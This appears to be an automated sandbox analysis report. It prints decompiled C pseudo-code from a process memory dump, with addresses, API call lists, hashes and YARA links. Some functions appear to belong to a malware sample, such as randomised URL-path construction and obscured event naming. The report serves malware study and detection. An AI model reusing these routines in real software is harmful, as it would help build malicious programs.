				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E032928F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03291000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03293915(_t101,  &_v428, _a8, _t96 - _t81);
					E03293915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E03291000(_t101,  &E0329A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03291000(_a16, _a4);
						E03293B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L03297D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03297D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0329679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E03295AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03294A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0329A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x03295d96
0x03295da2
0x03295da8
0x03295dad
0x03295db1
0x03295f23
0x03295f27
0x03295f27
0x03295db7
0x03295dbb
0x03295dc1
0x03295dc2
0x03295dcd
0x03295dd3
0x03295dd8
0x03295ddb
0x03295df5
0x03295e04
0x03295e10
0x03295e1a
0x03295e1f
0x03295e21
0x03295e24
0x03295edb
0x03295ee1
0x03295ef2
0x03295f05
0x03295f1b
0x00000000
0x03295f20
0x03295e2d
0x03295e34
0x03295e38
0x03295e3e
0x03295e40
0x03295e42
0x03295e44
0x03295e46
0x03295e50
0x03295e55
0x03295e57
0x03295e59
0x03295e5a
0x03295e5b
0x03295e5c
0x03295e63
0x03295e6a
0x03295e6d
0x03295e6d
0x03295e3a
0x03295e3a
0x03295e3a
0x03295e75
0x03295e7d
0x03295e89
0x03295e8e
0x03295e8e
0x03295e93
0x00000000
0x00000000
0x03295e95
0x03295e98
0x03295ea5
0x00000000
0x00000000
0x03295ea7
0x03295ea7
0x03295eb4
0x03295e8e
0x03295e93
0x00000000
0x00000000
0x00000000
0x03295e93
0x03295ebe
0x03295ec1
0x03295ec4
0x03295ecb
0x03295ecb
0x03295ed8
0x00000000
0x03295ed8
0x03295dc4
0x03295dc8
0x03295dc9
0x03295dcb
0x00000000
0x00000000
0x00000000
0x03295dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03295E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03295E5C
memset.NTDLL ref: 03295F05
memset.NTDLL ref: 03295F1B

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: e3848e32bdde19d7f08183e51b3ff5ffce47d89028acadf9a49c52b43825801e
Instruction ID: 7a73391bd825808cc47628c744ddf48352988a548dcf7b499e8dbfb9cf353c1f
Opcode Fuzzy Hash: e3848e32bdde19d7f08183e51b3ff5ffce47d89028acadf9a49c52b43825801e
Instruction Fuzzy Hash: 6441C435B20319AFEF11DF68CC40BEE7778EF46710F104566B959AB180DBB0AE948B90

Uniqueness

Uniqueness Score: -1.00%

Function 032914A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E032914A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x329a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E03296837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x329a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E032950CA(_v20);
											if(_v8 == 0) {
												_v8 = E032937FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E032925C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x032914a9
0x032914af
0x032914ba
0x032914ba
0x032914bc
0x03295aff
0x03295b02
0x03295b0b
0x03295b0e
0x03295b11
0x03295b19
0x03295c17
0x03295c22
0x03295c25
0x03295c27
0x00000000
0x03295c27
0x03295b1f
0x03295b22
0x03295c2a
0x03295c2a
0x03295b28
0x03295b2b
0x03295b2c
0x03295b2e
0x03295b37
0x03295c0e
0x03295b3d
0x03295b43
0x03295b4a
0x03295b4d
0x03295bfc
0x03295b53
0x00000000
0x03295b53
0x03295b53
0x03295b53
0x03295b53
0x03295b58
0x03295b5a
0x03295b5a
0x03295b67
0x03295b6f
0x00000000
0x00000000
0x03295b71
0x03295b7e
0x03295b84
0x03295b84
0x03295b87
0x00000000
0x00000000
0x03295b89
0x03295b94
0x03295ba8
0x03295bde
0x03295baa
0x03295baa
0x03295bb1
0x03295bb9
0x00000000
0x03295bbb
0x03295bbb
0x03295bc6
0x03295bc9
0x03295bd0
0x00000000
0x03295bd0
0x03295bc9
0x03295bb9
0x03295be1
0x03295be4
0x03295bec
0x03295bf7
0x03295bf7
0x00000000
0x03295bec
0x03295b91
0x00000000
0x03295bd3
0x03295bd3
0x00000000
0x03295bdc
0x03295c03
0x03295c03
0x03295c09
0x03295c09
0x03295b37
0x03295b22
0x03295c34
0x032914b1
0x032914b1
0x032914b8
0x032914c3
0x00000000
0x00000000
0x00000000
0x032914b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,03297134,00000000,?), ref: 03295B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,03297134,00000000,?,?), ref: 03295BBB

Part of subcall function 032925C7: wcstombs.NTDLL ref: 03292687

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 19c5647d9bcec6a1b94048c0b3dbe5ed4fb3ba54e60eee44a13892fa67a83832
Instruction ID: 9e78433543873c833e1acfd19e7807f770484a1fe0ab7cfc1d9f75988692d481
Opcode Fuzzy Hash: 19c5647d9bcec6a1b94048c0b3dbe5ed4fb3ba54e60eee44a13892fa67a83832
Instruction Fuzzy Hash: 98414175A2020AEFEF11DFA4D9889ADB7B8FF05344F2484ABE502E7154D7709AC4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F47630, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

std::_String_base::_Xlen.LIBCPMTD ref: 02F47643

Part of subcall function 02F48620: std::bad_exception::bad_exception.LIBCMTD ref: 02F48660
Part of subcall function 02F48620: __CxxThrowException@8.LIBCMTD ref: 02F4866E

std::_String_base::_Xlen.LIBCPMTD ref: 02F4766A
std::_String_base::_Xlen.LIBCPMTD ref: 02F47681
_memcpy_s.LIBCMTD ref: 02F476FA

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: String_base::_Xlenstd::_$Exception@8Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 649725542-0
Opcode ID: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction ID: dadac989630126710689b7adc013312e4ed65a7b685986ad578a3c2bbf3eaf0c
Opcode Fuzzy Hash: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction Fuzzy Hash: 913183327007058BC320EF5DD880A6BFBE6DBA12A5F50492EE69287651DBB1E8448F90

Uniqueness

Uniqueness Score: -1.00%

Function 03295C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 03295C8C
SysAllocString.OLEAUT32(03291E05), ref: 03295CCF
SysFreeString.OLEAUT32(00000000), ref: 03295CE3
SysFreeString.OLEAUT32(00000000), ref: 03295CF1

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a8813f15bc9f51a75fea0a28afd0e3e6b531afd08a26bf56b802d144f5af7476
Instruction ID: 2be4dbb6ff5c859d206b6246da1102ece7e4de432cfd5b72d504092fda5eb2d4
Opcode Fuzzy Hash: a8813f15bc9f51a75fea0a28afd0e3e6b531afd08a26bf56b802d144f5af7476
Instruction Fuzzy Hash: 74310C7591020AEFDF06DF98D4C48AEBBB9BF49340B20842FE90697210D7759585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032973C3, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E032973C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x329a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x329a2d4; // 0x214d5a8
				_t3 = _t8 + 0x329b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E03292DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x329a2f8, 1, 0, _t30);
					E032950CA(_t30);
				}
				_t12 =  *0x329a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0329513E() == 0) {
						_t28 =  *0x329a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E03296BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E032951A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x032973c4
0x032973cb
0x032973d5
0x032973d9
0x032973df
0x032973ec
0x032973f3
0x032973f7
0x03297409
0x0329740b
0x0329740b
0x03297410
0x03297417
0x03297422
0x03297438
0x0329743c
0x0329743e
0x03297443
0x03297443
0x03297450
0x03297454
0x03297458
0x00000000
0x00000000
0x03297466
0x0329746a
0x00000000
0x00000000
0x0329746a
0x03297454
0x00000000
0x0329746c
0x0329746c
0x0329746c
0x03297472
0x03297474
0x03297474
0x0329747e
0x03297482
0x03297494
0x03297494
0x03297498
0x0329749e
0x0329749e
0x032974a1
0x032974a3
0x032974a6
0x032974a6
0x032974ad
0x032974b3
0x032974b3

APIs

Part of subcall function 03292DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,053E9C98,7742C740,032955DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,032955DE), ref: 03292E20
Part of subcall function 03292DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 03292E44
Part of subcall function 03292DEA: lstrcat.KERNEL32(00000000,00000000), ref: 03292E4C

CreateEventA.KERNEL32(0329A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,032930E1,?,?,?), ref: 03297402

Part of subcall function 032950CA: HeapFree.KERNEL32(00000000,00000000,03294239,00000000,00000001,?,00000000,?,?,?,03296B8D,00000000,?,00000001), ref: 032950D6

WaitForSingleObject.KERNEL32(00000000,00004E20,032930E1,00000000,?,00000000,?,032930E1,?,?,?,?,?,?,?,0329211B), ref: 03297460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,032930E1,?,?,?), ref: 0329748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,032930E1,?,?,?), ref: 032974A6

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: cd84415ac256bc9f4716c26b34480bf4fef98327ca3fbbe681d8df1a05b510f9
Instruction ID: ddd1d88e6773232d9b2385d8aacab29dacc1a08f76569b971b4cd492727e2727
Opcode Fuzzy Hash: cd84415ac256bc9f4716c26b34480bf4fef98327ca3fbbe681d8df1a05b510f9
Instruction Fuzzy Hash: A121E6326313139BFF21EB6C9C48B56BAF8AB48B60F195227FD819B242D771D8808650

Uniqueness

Uniqueness Score: -1.00%

Function 03293032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E03293032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E03296710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E032915B9(_t23);
						}
					}
					return _t38;
				}
				if(E03294C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x329a2f8, 1, 0,  *0x329a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E03294039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03291D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03293C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E032973C3( &_v32, _t39);
					goto L13;
				}
			}

0x03293032
0x0329303f
0x03293045
0x03293046
0x03293047
0x03293048
0x03293049
0x0329304d
0x03293059
0x0329305d
0x032930e5
0x032930e5
0x032930e8
0x032930ea
0x032930f2
0x032930f8
0x032930fb
0x032930fb
0x032930f8
0x03293106
0x03293106
0x03293070
0x03293072
0x03293072
0x03293089
0x0329308d
0x03293090
0x0329309b
0x032930a2
0x032930a2
0x032930ae
0x032930af
0x032930bd
0x032930b1
0x032930b1
0x032930b2
0x032930b3
0x032930b4
0x032930b5
0x032930b6
0x032930b6
0x032930c2
0x032930c7
0x032930c9
0x032930cb
0x032930cb
0x032930d2
0x00000000
0x032930d4
0x032930d4
0x032930e1
0x00000000
0x032930e1

APIs

CreateEventA.KERNEL32(0329A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0329211B,?,00000001), ref: 03293083
SetEvent.KERNEL32(00000000,?,?,?,?,0329211B,?,00000001,0329560C,00000002,?,?,0329560C), ref: 03293090
Sleep.KERNEL32(00000BB8,?,?,?,?,0329211B,?,00000001,0329560C,00000002,?,?,0329560C), ref: 0329309B
CloseHandle.KERNEL32(00000000,?,?,?,?,0329211B,?,00000001,0329560C,00000002,?,?,0329560C), ref: 032930A2

Part of subcall function 03294039: WaitForSingleObject.KERNEL32(00000000,?,?,?,032930C2,?,032930C2,?,?,?,?,?,032930C2,?), ref: 03294113
Part of subcall function 03294039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,032930C2,?,?,?,?,?,0329211B,?), ref: 0329413B

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 8daebc431a4dd7f8a6cc61085d040ff25a147a8d234e82ad257a2df7fff99357
Instruction ID: cd0e21709a85eae36e8bd337fcf2699f8cc8e2953351e56da1510f1bc9c884ac
Opcode Fuzzy Hash: 8daebc431a4dd7f8a6cc61085d040ff25a147a8d234e82ad257a2df7fff99357
Instruction Fuzzy Hash: A621C87AD20215ABEF10FFE598849EEB7BDAF04350B06842BEB51E7100D771D9C487A1

Uniqueness

Uniqueness Score: -1.00%

Function 03294D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E03294D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03296837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x03294d15
0x03294d19
0x03294d1a
0x03294d1b
0x03294d1d
0x03294d1f
0x03294d24
0x03294d27
0x03294dbe
0x03294dc5
0x03294dc5
0x03294d30
0x03294d37
0x03294d47
0x03294d47
0x03294d4d
0x03294d4f
0x03294d54
0x03294d5d
0x03294d65
0x03294d68
0x03294d73
0x03294d77
0x03294d79
0x03294d7a
0x03294d83
0x03294d87
0x03294d98
0x03294d89
0x03294d8e
0x03294d93
0x03294da2
0x03294da2
0x03294d77
0x03294da8
0x03294dae
0x03294dae
0x03294db7
0x03294dbc
0x03294dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 03294D37
lstrlenW.KERNEL32(?), ref: 03294D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 03294D8E
SysFreeString.OLEAUT32(?), ref: 03294DA2

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 13fa7dfb9fc45288c919c15759a2e40c068f397f2097a8b3eceec56e51a85e58
Instruction ID: 6bb991af2c57840da4f5def54dd21545e5767fced51651a9f611fde918fd439c
Opcode Fuzzy Hash: 13fa7dfb9fc45288c919c15759a2e40c068f397f2097a8b3eceec56e51a85e58
Instruction Fuzzy Hash: B7216279901219EFDF10EFA5D8849DEBBB8FF48311B15816EE805D7204E771DA81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 032952E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E032952E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x329a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x329a2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x329a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x032952ed
0x032952f0
0x032952f6
0x0329530e
0x03295312
0x03295315
0x03295317
0x0329531a
0x0329531c
0x0329531f
0x03295321
0x03295321
0x03295323
0x0329532e
0x03295333
0x03295344
0x0329534c
0x03295351
0x03295354
0x03295357
0x03295359
0x0329535f
0x03295362
0x03295362
0x03295362
0x0329536d
0x03295372
0x0329537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,032962E0,00000000,?,00000000,032970D9,00000000,053E9630), ref: 032952F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 03295308
memcpy.NTDLL(00000000,053E9630,-00000008,?,?,?,032962E0,00000000,?,00000000,032970D9,00000000,053E9630), ref: 0329534C
memcpy.NTDLL(00000001,053E9630,00000001,032970D9,00000000,053E9630), ref: 0329536D

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: a60d179a967de98f222e29df777868e48f988cfad89a8fb558b2518605e4f226
Instruction ID: f9bb431947f21b7bff397f103ad3c30b1f12b4bbfbe001be7faeb408494d8dcd
Opcode Fuzzy Hash: a60d179a967de98f222e29df777868e48f988cfad89a8fb558b2518605e4f226
Instruction Fuzzy Hash: A8115C72E102047FDB10CF69EC88D5EBBFDEB85260B194177F404CB140E6B09940C390

Uniqueness

Uniqueness Score: -1.00%

Function 0329578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0329578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E03296837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x32992a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x32992a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x03295797
0x0329579b
0x0329579d
0x0329579e
